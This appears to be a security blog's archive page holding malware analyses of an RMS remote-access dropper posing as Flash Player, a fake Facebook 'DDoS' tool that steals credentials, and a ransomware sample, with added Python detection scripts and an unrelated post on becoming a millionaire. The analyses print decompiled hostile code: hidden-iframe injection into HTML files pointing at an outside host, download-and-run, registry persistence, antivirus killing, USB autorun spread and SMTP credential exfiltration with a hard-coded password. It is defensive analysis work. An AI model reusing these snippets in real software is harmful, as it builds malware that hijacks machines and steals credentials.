Friday, October 27, 2017

Quick Sample Analysis

File detail:
File Name: Micrbarin.exe
MD5: 21AE834BDD5B89BACACCA4D51CF82148
Size: 3.64 MB
NSIS installer file

The file is an NSIS installer; the NSIS marker strings are visible inside the binary.

Behavioural Analysis
We executed Micrbarin.exe in a controlled environment to observe its behaviour. New processes appeared in memory, and a Windows Security Alert blocked one of them, identifying the file as Adobe Flash Player; the new processes also carry the Flash Player icon.

Registry traces:
HKEY_CURRENT_USER\Software\TektonIT
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\All Users\rutserv.exe" Data: Adobe Flash Player 27.0 r0
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\All Users\rutserv.exe"   Data: Adobe Flash Player 27.0 r0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "sys"
Data: c:\ProgramData\rutserv.exe
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "CalendarRecordSettings"
Data: (data too large: 1182 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "FUSClientPath"
Data: C:\Documents and Settings\All Users\rfusclient.exe
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "InternetId"
Data: (data too large: 352 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "notification"
Data: (data too large: 563 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "Options"
Data: (data too large: 1391 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "Password"
Data: (data too large: 256 bytes)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Documents and Settings\All Users\rutserv.exe"
Data: C:\Documents and Settings\All Users\rutserv.exe:*:Enabled:Adobe Flash Player 27.0 r0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Documents and Settings\All Users\rutserv.exe"
Data: C:\Documents and Settings\All Users\rutserv.exe:*:Enabled:Adobe Flash Player 27.0 r0

Files created:
c:\Documents and Settings\All Users\rfusclient.exe
c:\Documents and Settings\All Users\rutserv.exe
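The traces above show the pattern a defender can alert on: a remote-administration tool (Remote Manipulator System by TektonIT) installed under a shared data directory, autostarted from the Run key, and whitelisted in the Windows firewall under a description that claims to be Adobe Flash Player. The following Python script is an added example, not part of the original post or of any sandbox tool; it parses trace lines in the format quoted above and flags those four indicators. The check that a real Flash Player lives under a Macromed\Flash directory is a heuristic of my own.

```python
import re
from dataclasses import dataclass

# Sandbox registry trace lines quoted from the post above (key "value", Data: either
# on the same line or on the following line).
TRACE = r"""
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "FUSClientPath"
Data: C:\Documents and Settings\All Users\rfusclient.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "sys"
Data: c:\ProgramData\rutserv.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Documents and Settings\All Users\rutserv.exe"
Data: C:\Documents and Settings\All Users\rutserv.exe:*:Enabled:Adobe Flash Player 27.0 r0
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\All Users\rutserv.exe"   Data: Adobe Flash Player 27.0 r0
"""


@dataclass
class Entry:
    key: str
    value: str
    data: str


ENTRY_RE = re.compile(r'^(HKEY_.*?)\s+"([^"]*)"(?:\s+Data:\s*(.*))?\s*$')
# Firewall AuthorizedApplications data layout: <path>:*:Enabled|Disabled:<description>
FW_RE = re.compile(r'^(.*?):\*:(Enabled|Disabled):(.*)$')


def parse_trace(text):
    """Turn the sandbox trace text into Entry objects, joining 'Data:' continuation lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Data:") and entries:
            entries[-1].data = line[len("Data:"):].strip()
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append(Entry(m.group(1), m.group(2), (m.group(3) or "").strip()))
    return entries


def _claims_flash(desc):
    return "adobe flash player" in desc.lower()


def _in_flash_dir(path):
    # Heuristic (assumption): the genuine Flash Player binaries live under ...\Macromed\Flash\.
    return "\\macromed\\flash\\" in path.lower()


def find_indicators(entries):
    """Return (rule, detail) pairs for the RMS/Flash-masquerade pattern seen in the post."""
    hits = []
    for e in entries:
        k = e.key.lower()
        if "\\tektonit\\remote manipulator system" in k:
            hits.append(("rms_install", e.key))
        if k.endswith("\\currentversion\\run") and re.search(r"\\(programdata|all users)\\", e.data.lower()):
            hits.append(("run_from_shared_dir", f"{e.value} -> {e.data}"))
        if "authorizedapplications\\list" in k:
            m = FW_RE.match(e.data)
            if m and _claims_flash(m.group(3)) and not _in_flash_dir(m.group(1)):
                hits.append(("firewall_exception_masquerade", m.group(1)))
        if "\\muicache" in k and _claims_flash(e.data) and not _in_flash_dir(e.value):
            hits.append(("muicache_masquerade", e.value))
    return hits


if __name__ == "__main__":
    for rule, detail in find_indicators(parse_trace(TRACE)):
        print(f"{rule:32} {detail}")
```

Feeding a real sandbox report through `parse_trace` and then `find_indicators` gives a short list of rule hits that map directly onto the persistence, firewall and masquerade artefacts this sample leaves behind.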



Sunday, October 15, 2017

Three ways to become Millionaire

A millionaire is a person who holds more than a million US dollars in assets such as property, stocks, vehicles and cash in the bank. At least 90% of the people in this world have thought about becoming a millionaire at some point in their lifetime. The next question that arises in everyone's mind is whether it is achievable and, if so, how.


Let us break it down into three ways to become a millionaire:
  • Side lane
  • Slow lane
  • Fast lane

These three ways help people reach millionaire status at some point in their life. What are these lanes and what do they actually mean?
These lanes are paths to the same goal, like travelling to the same destination by different routes. We will explain each lane and what it actually takes. The first one on our list is the side lane.

Side lane
If you have athletic ability, you can choose the side lane. The side lane is the path for people who perform prominently in sports. If you know boxing well, you can spend more time practising boxing and earn millions of dollars in a match. The problem with this lane is that people who perform well in sports often stop receiving pay cheques after they stop playing, due to poor money management. We can name hundreds of athletes who were not paid after their heyday or peak time ended.


Pros of side lane:
Reaching great fame in a short period.
Earning millions per year, and even millions per season.


Cons of side lane:
Prime time or peak time is very limited.
Sports people most of the time have poor money management.

Slow lane
The slow lane is the easiest way to become a millionaire, but it is also the slowest way to reach the destination. This is for the general population who lack athletic ability and creative thinking. Join a good institution, study a craft or a course of interest, and get a job as an office worker. If they save five to ten percent per year and invest it in banks and stocks, it will yield them millionaire status at retirement time.


Pros of slow lane:
Steady growth
More chance of reaching the goal


Cons of slow lane:
Reaching the goal takes almost a lifetime.

Fast lane
This is the rocket-speed lane. In this lane, you need to give more value to society so that it returns to you. Take the examples of Gates, Jobs, Musk, Zuckerberg and Page: they all give more to society. If you have creativity, dedication to the core will give you the leading edge. Suppose you find the cure for diseases like cancer and AIDS. Then you will not just become a millionaire; you will end up a billionaire.


Pros of fast lane:
No need to wait a lifetime to reach the goal.
Enormous wealth in a short span.


Cons of fast lane:
The only thing is that you need to be a very hard worker and a risk taker. Most of the time ends up being spent on research, studying needs, and business meetings, which include satisfying customers, investors and your employees.

Conclusion
Please choose wisely and reach your goal. Becoming a millionaire is in your hands; only your decision makes what you are going to be. And the last lane can even make you a billionaire.

Post by
newWorld

Friday, October 13, 2017

Fake Facebook DDoS Malware – Actually a password stealer

Last month security researchers discovered a Facebook password stealer malware bundled with njRat. This month we got another sample which claims that it can target a given profile and perform a DDoS against it. In reality it is a password stealer, and it targets Turkish users.

Static Analysis of the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-Bit Exe
Size: 845824 Byte(s)

Figure 1 CompilerDetect -> .NET
The malware is compiled with .NET, so we started with string and code analysis of the sample. Looking at the strings, we found some very interesting details:

·         0000000CCA0D   0000004CE60D      0   Account Close
·         0000000CCA29   0000004CE629      0   CheckBox3
·         0000000CCA63   0000004CE663      0   ProgressBar1
·         0000000CCA7D   0000004CE67D      0   Label4
·         0000000CCADF   0000004CE6DF      0   $this.BackgroundImage
·         0000000CCB0B   0000004CE70B      0   $this.Icon
·         0000000CCB21   0000004CE721      0   FACEBOOK
·         0000000CCB33   0000004CE733      0   FACEBOOK KAPATMA 2017
·         0000000CCB5F   0000004CE75F      0   Login Successful Account will be closed within 5 minutes.
·         0000000CCBD3   0000004CE7D3      0   furkanbabalog(at)gmail.com
·         0000000CCC03   0000004CE803      0   smtp.gmail.com
·         0000000CCC21   0000004CE821      0   sanane123
·         0000000CCC35   0000004CE835      0   Facebook_Kapatma_2017.Resources
·         0000000CDB66   0000004D2166      0   VS_VERSION_INFO
·         0000000CDBC2   0000004D21C2      0   VarFileInfo
·         0000000CDBE2   0000004D21E2      0   Translation
·         0000000CDC06   0000004D2206      0   StringFileInfo
·         0000000CDC2A   0000004D222A      0   000004b0
·         0000000CDC42   0000004D2242      0   FileDescription
·         0000000CDC64   0000004D2264      0   Facebook Kapatma 2017
·         0000000CDC96   0000004D2296      0   FileVersion
·         0000000CDCB0   0000004D22B0      0   1.0.0.0
·         0000000CDCC6   0000004D22C6      0   InternalName
·         0000000CDCE0   0000004D22E0      0   Facebook Kapatma 2017.exe

The file description, resource details and e-mail credentials (highlighted in red in the screenshot) are found inside the sample. Using these credentials we tried to log in to stop the theft, but Gmail blocked the attempt because the device was not recognised. It is probably a placeholder account for the attacker.
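To triage samples like this one quickly, it helps to pull the exfiltration indicators straight out of a strings dump. The script below is an added example (not from the post or from any tool it uses); it parses rows in the column layout shown above, extracts e-mail addresses and mail-server host names, and reports the string that immediately follows a mail host as a candidate hard-coded credential. The neighbour-string heuristic and the defanged (at) notation are assumptions of the example.

```python
import re

# Constructed excerpt of the strings dump listed above (offset, RVA, flag, string);
# the bullet and column layout mirror the post's listing.
STRINGS_DUMP = """
·         0000000CCB5F   0000004CE75F      0   Login Successful Account will be closed within 5 minutes.
·         0000000CCBD3   0000004CE7D3      0   furkanbabalog(at)gmail.com
·         0000000CCC03   0000004CE803      0   smtp.gmail.com
·         0000000CCC21   0000004CE821      0   sanane123
·         0000000CCC35   0000004CE835      0   Facebook_Kapatma_2017.Resources
·         0000000CDC64   0000004D2264      0   Facebook Kapatma 2017
"""

# One dump row: optional bullet/whitespace, file offset, RVA, flag column, then the string.
ROW_RE = re.compile(r"^\W*([0-9A-Fa-f]{6,})\s+([0-9A-Fa-f]{6,})\s+(\d+)\s+(.*\S)\s*$")
# Accept both a literal '@' and the defanged '(at)' used in the write-up.
EMAIL_RE = re.compile(r"[\w.+-]+(?:@|\(at\))[\w-]+\.[\w.-]+")
MAIL_HOST_RE = re.compile(r"^(?:smtp|mail|imap|pop3?)\.[\w.-]+$", re.I)


def parse_dump(text):
    """Return (file_offset, string) pairs in dump order."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((int(m.group(1), 16), m.group(4)))
    return rows


def exfil_indicators(rows):
    """Collect e-mail addresses, mail hosts, and candidate secrets adjacent to a mail host."""
    strings = [s for _, s in rows]
    emails = [s for s in strings if EMAIL_RE.fullmatch(s)]
    hosts = [s for s in strings if MAIL_HOST_RE.match(s)]
    secrets = []
    for i, s in enumerate(strings):
        if s not in hosts:
            continue
        # Heuristic (assumption): a compact token stored right after the SMTP host name
        # is likely the password passed to the SMTP client.
        for nxt in strings[i + 1:i + 3]:
            if 6 <= len(nxt) <= 32 and not re.search(r"[\s./\\]", nxt) and nxt not in emails:
                secrets.append(nxt)
                break
    return {"emails": emails, "mail_hosts": hosts, "candidate_secrets": secrets}


if __name__ == "__main__":
    print(exfil_indicators(parse_dump(STRINGS_DUMP)))
```

On the real dump the same call returns the Gmail account, the SMTP host and the password that the decompiled code later confirms, which is enough to write a network detection for outbound SMTP to that host from a non-mail process.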

Figure 2 Gmail security ask for verification

The file resources show a background image that looks like the hackers in movie posters.

Figure 3 Background Image

Figure 4 Facebook Kapatma

'Kapatma' is a Turkish word meaning 'close down'. The above image shows the classes found in the code. Inside the code we find the input controls, such as the check boxes and labels:
this.Label1.Text = "E-posta";              // E-posta means e-mail.
this.Label2.Text = "Şifre";                // Şifre means password.
this.CheckBox1.Text = "Ddos Attack";
this.Button1.Text = "Hesabı Kapat";        // Hesabı Kapat means close account.
this.Label3.Text = "URL:";
this.CheckBox3.Text = "Complaint Attack\r\n";
this.Label4.Text = "NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // NOTE: account closed within 5 minutes.
The purpose is to collect the Facebook credentials entered into the tool; the URL entered is supposedly the profile to be attacked. Let us see how the collected details are transferred.
private void Button1_Click(object sender, EventArgs e)
{
    MailMessage mailMessage = new MailMessage();
    try
    {
        Interaction.MsgBox("Login Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly, null);
        mailMessage.From = new MailAddress("furkanbabalog(at)gmail.com");
        mailMessage.To.Add("furkanbabalog(at)gmail.com");
        mailMessage.Subject = this.TextBox1.Text;   // presumably the e-mail field (Label1 "E-posta")
        mailMessage.Body = this.TextBox2.Text;      // presumably the password field (Label2 "Şifre")
        new SmtpClient("smtp.gmail.com")
        {
            Port = 587,
            EnableSsl = true,
            Credentials = new NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
        }.Send(mailMessage);
    }
    catch (Exception)
    {
        // handler body not shown in the decompiled snippet
    }
}
The above snippet shows that the collected credentials are sent by e-mail: the code logs in to the given Gmail account and mails the details to that same account, i.e. the From and To addresses are identical.

Behavioural analysis

We executed the sample in our controlled environment and observed that the file opens a GUI as follows:

Figure 5 GUI of the fake tool


We entered random text in the text boxes and selected all the check boxes. Once we clicked the button, a message box appeared saying that login was successful and the account would be closed in 5 minutes.

Figure 6 Login successful message box


No file or registry traces were added after execution of this malware.

Conclusion:

We are seeing an emerging trend of Facebook hacking tools and DDoS tools that actually steal the tool user's own credentials rather than attacking the given target. It is high time to educate users that these tools are fake: they are password stealers, not hacking or cracking tools. In this case the target is Turkish users, and we may expect similar tools in other parts of the world.

Friday, October 6, 2017

Analysis of Hackers Invasion ransomware

OVERVIEW

Today we got a new ransomware for analysis; it is named Hacker Invasion ransomware and is also referred to as FTSCoder ransomware.


DELIVERY
Variants of the Hacker Invasion ransomware family are delivered by the malware authors breaking into the network. E-mail campaigns are the other option attackers use to deliver these variants.


INFECTION

Static Analysis:
MD5: B6E74930507305AC9B98A16230A5B02C

Figure 1 Compiled in .net
Compiler Detect -> .NET 
File Type: 32-Bit Exe (Subsystem: Win GUI / 2), Size: 53760 (0D200h) Byte(s). The file has version info that gives the original file name as 'NIBIRU1.exe' and the product name and description as 'NIBIRU'. Searching for these names returned only generic results. We started our static analysis to see what the malware code does.

This sample has a class called 'anti'. Inside this class there is a function called 'killall()'.
Figure 2 Class anti (killall function)


The above snapshot also shows the other classes apart from 'anti': msnshare, skype, p2p, yahoo and usb. We will look into these one by one.

Figure 3 killall function
The killall function compares a list of strings against the names of running processes; if a process name contains one of the strings, it obtains the process via GetProcess() and kills it. The strings the function looks for in the running processes are:
·         Av - antivirus
·         Hijackthis - tool that inspects the browser and operating system settings and generates a log file of the current state of the computer.
·         Outpost - personal firewall (component of Agnitum Outpost Firewall Pro).
·         Npfmsg - NPFMessenger MFC application, part of the NPFMessenger software.
·         Bdagent - file associated with Bitdefender antivirus.
·         Kavsvc - file associated with Kaspersky antivirus.
·         Egui - file associated with ESET antivirus.
·         Zlclient - file associated with Zone Labs ZoneAlarm.
All these processes belong to security products, so the malware kills them to stop them functioning.
There are four forms in the list of classes, and their functionality is spread across the other classes: injectx, skype, yahoo, p2p and msnshare. We checked each of these classes to understand their functionality. Let us see what the injectx class does.
The injectx class launches a batch script. It starts by looking for a batch file inside the system32 folder (refer to the following code).

public static void injectX_Sp()
{
    try
    {
        if (File.Exists("C:\\WINDOWS\\system32\\launch.bat"))
        {
            File.Delete("C:\\windows\\system32\\launch.bat");
        }
        // else branch (creation of launch.bat) follows; remainder of the method not shown here

The function checks for launch.bat; if the file exists it deletes it, otherwise it creates the script in the same location. Refer to the following snapshot:

Figure 4 creation of launch batch script
The above snapshot is the else branch for the case where launch.bat is absent. The launch batch script is created by this function; the lines it writes include:
// The writer variable name is not visible in the decompiled snapshot; "streamWriter" is assumed here.
streamWriter.WriteLine("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%o");
streamWriter.WriteLine(")");
streamWriter.WriteLine("for %%m in (*.html) do (");
streamWriter.WriteLine("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%m");
streamWriter.WriteLine(")");
streamWriter.WriteLine("for %%y in (*.htm) do (");
streamWriter.WriteLine("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%y");
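The batch script appends a hidden iframe to every .html and .htm file it finds, so the durable artefact on an infected host is an iframe with height=0 width=0 tacked on after the document's closing tag. The Python scanner below is an added example (not the ransomware's code and not from the post); it flags iframes that are zero-sized or hidden by style, or that sit after </html>, and the sample pages it runs on are constructed here.

```python
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# Attribute scanner tolerant of the missing space before 'height' in the injected tag.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")


def _attrs(raw):
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(raw)}


def _is_zero(v):
    # "0" and "0px" both count as a zero dimension
    return v is not None and v.strip().lower().rstrip("px") == "0"


def scan_html(text):
    """Return one finding per iframe that is hidden (0x0 or display:none) or placed after </html>."""
    end = text.lower().rfind("</html>")
    findings = []
    for m in IFRAME_RE.finditer(text):
        a = _attrs(m.group(1))
        hidden = (_is_zero(a.get("height")) and _is_zero(a.get("width"))) or \
                 "display:none" in a.get("style", "").replace(" ", "").lower()
        appended = end != -1 and m.start() > end
        if hidden or appended:
            findings.append({"src": a.get("src", ""), "hidden": hidden, "after_html_end": appended})
    return findings


def scan_tree(root):
    """Scan every .htm/.html file below root; returns {path: findings} for files with hits."""
    out = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in (".htm", ".html"):
            hits = scan_html(p.read_text(errors="replace"))
            if hits:
                out[str(p)] = hits
    return out


# Constructed sample pages: a clean page with a legitimate embed, and the same page after
# the batch script has appended its hidden iframe (URL defanged as in the post).
CLEAN = ('<html><body><h1>Hi</h1>'
         '<iframe src="https://example.invalid/embed" width=300 height=150></iframe>'
         '</body></html>\n')
INFECTED = CLEAN + ('<iframe src="hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/'
                    'tmpl/Config/show.php"height=0 width=0>\n')

if __name__ == "__main__":
    print("clean:", scan_html(CLEAN))
    print("infected:", scan_html(INFECTED))
```

Running `scan_tree` over a web root or a user's documents folder is a cheap way to confirm which pages were tampered with and to clean them, since the injected tag always trails the original document.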




When we accessed that URL it returned a 404 from the site; it seems show.php and the modules directory have been removed. Apart from creating the batch file, this function creates another script, launch.vbs, in the system32 location:
FileStream stream2 = new FileStream("C:\\windows\\system32\\launch.vbs", FileMode.Create, FileAccess.Write);
StreamWriter streamWriter2 = new StreamWriter(stream2);
streamWriter2.BaseStream.Seek(0L, SeekOrigin.End);
streamWriter2.WriteLine("Dim oShell");
streamWriter2.WriteLine("Set oShell = WScript.CreateObject (\"WScript.Shell\")");
streamWriter2.WriteLine("oShell.run \"C:\\windows\\system32\\launch.bat\",0,True"); // window style 0: the batch runs hidden
streamWriter2.WriteLine("Set oShell = Nothing ");
streamWriter2.Close();
Process.Start("C:\\windows\\system32\\launch.vbs");
The above code creates the VBScript, whose job is to run launch.bat; the final line starts launch.vbs as a process.
The Install class comes next in the code. It copies the executable to the root of the local drive as svchost.exe and sets the hidden attribute on the file.
File.Copy(Application.ExecutablePath, "C:\\svchost.exe");
File.SetAttributes("C:\\svchost.exe", FileAttributes.Hidden);

Figure 5 Class Install (code)

This piece of code is interesting. After creating the svchost.exe file on the C: drive, the code downloads a file from a link to a given name and location. Refer to this code:
MyProject.Computer.Network.DownloadFile(install.link, Application.StartupPath + "\\file.exe");
File.SetAttributes(Application.StartupPath + "\\file.exe", FileAttributes.Hidden);
Process.Start(Application.StartupPath + "\\file.exe");
Further, an HTML file named sp.htm is created in the Windows folder.
StreamWriter streamWriter = new StreamWriter("C:\\windows\\sp.htm");
File.SetAttributes("C:\\WINDOWS\\sp.htm", FileAttributes.Normal);
This sp.htm file contains an iframe pointing at install.link, the same link whose download is saved in the startup path as 'file.exe'. After the file creation and download, persistence for svchost.exe is established using two registry keys.
MyProject.Computer.Registry.SetValue("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Microsoft", "C:\\svchost.exe");
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", "C:\\WINDOWS\\SYSTEM32\\Userinit.exe,C:\\svchost.exe");
These are autostart entries (a Run key entry and a Winlogon entry) that point to the physical file location. These artifacts can be used as IOCs.
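Both registry writes are easy to audit. The Python check below is an added example (not from the post); it takes (key, value name, data) tuples such as a registry export parser would produce, the two observed here being copied from the decompiled code, and flags a Winlogon Userinit value with extra programs or a relocated userinit.exe, as well as Run entries whose file name is a Windows system binary (svchost.exe, lsass.exe, ...) living outside System32. The list of system binary names is my own.

```python
import ntpath

# The two values the ransomware writes (from the decompiled code above), as a constructed
# list of (key, value_name, data) tuples.
OBSERVED = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft", r"C:\svchost.exe"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit",
     r"C:\WINDOWS\SYSTEM32\Userinit.exe,C:\svchost.exe"),
]

# Assumption of this example: names of core Windows binaries that should only run from System32/SysWOW64.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe", "userinit.exe"}
SYSTEM_DIRS = ("\\windows\\system32", "\\windows\\syswow64")


def _in_system_dir(path):
    return ntpath.dirname(path).lower().endswith(SYSTEM_DIRS)


def check_userinit(data):
    """Userinit is a comma-separated list; only system32\\userinit.exe should be there."""
    entries = [e.strip().strip('"') for e in data.split(",") if e.strip()]
    findings = []
    if not entries or ntpath.basename(entries[0]).lower() != "userinit.exe":
        findings.append(("userinit_replaced", data))
    elif not _in_system_dir(entries[0]):
        findings.append(("userinit_relocated", entries[0]))
    for extra in entries[1:]:
        findings.append(("userinit_extra_program", extra))
    return findings


def check_run_value(name, data):
    """Flag a Run entry that borrows a system binary's name but lives elsewhere."""
    path = data.strip().strip('"')
    if ntpath.basename(path).lower() in SYSTEM_NAMES and not _in_system_dir(path):
        return [("system_binary_name_outside_system32", path)]
    return []


def audit(entries):
    findings = []
    for key, name, data in entries:
        k = key.lower()
        if k.endswith("\\winlogon") and name.lower() == "userinit":
            findings += check_userinit(data)
        elif k.endswith("\\currentversion\\run"):
            findings += check_run_value(name, data)
    return findings


if __name__ == "__main__":
    for rule, detail in audit(OBSERVED):
        print(f"{rule:40} {detail}")
```

On a live host the same tuples can be produced from `reg query` output or a `.reg` export; a Userinit value with anything after the first comma is almost always worth a look, because Windows itself only ever sets the single userinit.exe path (with a trailing comma).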


Figure 6 Lan class
The Lan class collects details of the host machine such as host address, host name and workgroup. We moved on to the msnshare class, which creates a new file called 'mypornpics.scr' in the messenger folder under the AppData location. Refer to the following snapshots:

Figure 7 File location used by MSN class

Figure 8 Checking for the existence of the file called 'mypornpics'
Except for the USB class, the other classes (skype, yahoo) do much the same as the MSN class. Let us focus on the functionality of the USB class:
The USB class retrieves the logical drives using Directory.GetLogicalDrives(). It copies a file named 'ntldr.exe' to each drive, and then creates an autorun.inf file, writing it line by line as in the following code:
StreamWriter streamWriter = new StreamWriter(str + "autorun.inf");
streamWriter.WriteLine("[autorun]");
streamWriter.WriteLine("open = ntldr.exe");
streamWriter.WriteLine("shellexecute=ntldr.exe");
streamWriter.Close();
File.SetAttributes(str + "autorun.inf", FileAttributes.Hidden);
File.SetAttributes(str + "ntldr.exe", FileAttributes.Hidden);
This code writes the actual content of autorun.inf, which causes ntldr.exe to run automatically, and sets the hidden attribute on both files (autorun.inf and ntldr.exe).
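The autorun.inf written above is the classic removable-drive persistence trick. The parser below is an added example (not from the post); it reads an autorun.inf, reports every directive that launches a program (open, shellexecute, shell\...\command) and additionally notes a target whose name mimics the NT boot loader file name ntldr, as this sample's does. The autorun.inf text it checks is the one the malware writes, reproduced here as a constructed string.

```python
# autorun.inf content as written by the USB class above (constructed string for this example)
AUTORUN_TEXT = """[autorun]
open = ntldr.exe
shellexecute=ntldr.exe
"""

LAUNCH_KEYS = {"open", "shellexecute"}
# Assumption of this example: names that masquerade as Windows boot files
BOOT_FILE_NAMES = ("ntldr", "ntdetect", "bootmgr")


def parse_autorun(text):
    """Minimal INI parser: {section: {key: value}}, keys lower-cased, comments skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            k, v = line.split("=", 1)
            sections[current][k.strip().lower()] = v.strip()
    return sections


def assess_autorun(text):
    """Return (rule, directive, target) findings for an autorun.inf."""
    findings = []
    auto = parse_autorun(text).get("autorun", {})
    for key, val in auto.items():
        target = val.split()[0].strip('"') if val else ""
        launches = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if not launches:
            continue
        findings.append(("launch_directive", key, target))
        base = target.lower().rsplit("\\", 1)[-1]
        if base.startswith(BOOT_FILE_NAMES):
            findings.append(("mimics_boot_loader_name", key, target))
    return findings


if __name__ == "__main__":
    for finding in assess_autorun(AUTORUN_TEXT):
        print(finding)
```

Modern Windows ignores open/shellexecute for removable media, but the file still travels with the drive and is a reliable indicator that a drive passed through an infected host; the hidden attribute on ntldr.exe beside it is the second half of the pair.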

Interesting resource detail (string table)

Figure 9 Panic message
This panic message was found in the file resources; it belongs to form3. It is time to look at the code of all four forms (form1, form2, form3 and form4).
this.yourmutex = Environment.UserName + "MutexXx";
A mutex is created from the user name combined with "MutexXx". Only after this does InitializeComponent run, with a list box, and finally the following are called:
·         Install()
·         InjectX.injectX_Sp();
·         lan.lan_sp();
·         anti.killall();
·         msnshare.msnshare_sp();
·         p2p.p2p_sp();
·         yahoo.yahoo_sp();
·         skype.skype_sp();
·         usb.usb_sp();
Then it sleeps: Form1.Sleep(1500000L). Finally it starts the process 'svchost.exe': Process.Start("C:\\svchost.exe").
Next we analysed the code of the form2 class and its functions. It contains the encryption routines, the targeted file types, and the extension added to encrypted files.
public enum CryptoAction
{
    ActionEncrypt = 1,
    ActionDecrypt
}
The above snapshot is the code for encrypting files. A FileStream opens each file with read access and writes the file back after encryption. Form2 closes with the following message box:
MessageBox.Show("STOP,pay your ransome", "Security", MessageBoxButtons.OK, MessageBoxIcon.Hand);
Similar to a panic message or an alert to the victim. The extension given to encrypted files is .Doxes.
byte[] bytKey = this.CreateKey("Doxes");
byte[] bytIV = this.CreateIV("Doxes");
this.EncryptOrDecryptFile(this.filenamez, this.filenamez + ".Doxes", bytKey, bytIV, Form2.CryptoAction.ActionEncrypt);
The encrypted files are given the extension ".Doxes".
Form3 is very important because we found the unlock key for this ransomware in it. Its label3 text is shocking: the ransom amount is USD 120K, and if delayed it rises to USD one million.
Label3.Text = "WE ARE READY TO GIVE YOU THE KEY TO GET ALL YOUR FILES,\r\nDOCUMENTS AND YOUR LIFE BACK IF ONLY YOU PAY $120,000\r\nWITHIN 54 HOURS.IF YOU DELAY YOU PAY $1 MILLION TO US.";
And label6 shows the detail of how to pay the ransom via bitcoin.
Label6.Text = "(1)Google Paxful.com (2)SIGN UP AND GET A BITCOIN WALLET\r\n(3)BUY $120,000 WORTH OF BITCOIN(4)PAY INTO OUR BITCOIN ADDRESS\r\nABOVE(5)SEND THE PAYMENT PROOF TO OUR CONTACTS(6)YOU GET KEY";
E-mail contact details are given in label7:
Label7.Text = "(1) HillaryTrump(at)protonmail.com\r\n(2)James.cute(at)mail.com";

The key to unlock is actually present inside the program. Let us see the code below:
Label8.Text = "ENTER KEY";
Control arg_689_0 = this.TextBox1;
Label8 is the prompt for entering the key, which is read from TextBox1.
Operators.CompareString(this.TextBox1.Text, "AnikulapoFela70", false) // the snapshot cuts off after the literal; the third argument (case-sensitive compare) is assumed
The key to unlock is AnikulapoFela70.

Figure 11 Ransom screen with ransom notes, payment detail, and enter key box
THREAT INDICATORS
IOC details:
Email:
HillaryTrump(at)protonmail.com
James.cute(at)mail.com
File Extension added:
.Doxes

Conclusion
Ransomware attacks are carried out by malware authors with new functionality and better targeting. To prevent these attacks, best security practice consists of proper backups and up-to-date anti-ransomware modules in a top antivirus product. Users are advised to be more cautious with attachments from unknown senders. Keeping network passwords strong will also help.



Operating system - Part 1:

 In our blog, we published several articles on OS concepts which mostly on the perspective for malware analysis/security research. In few in...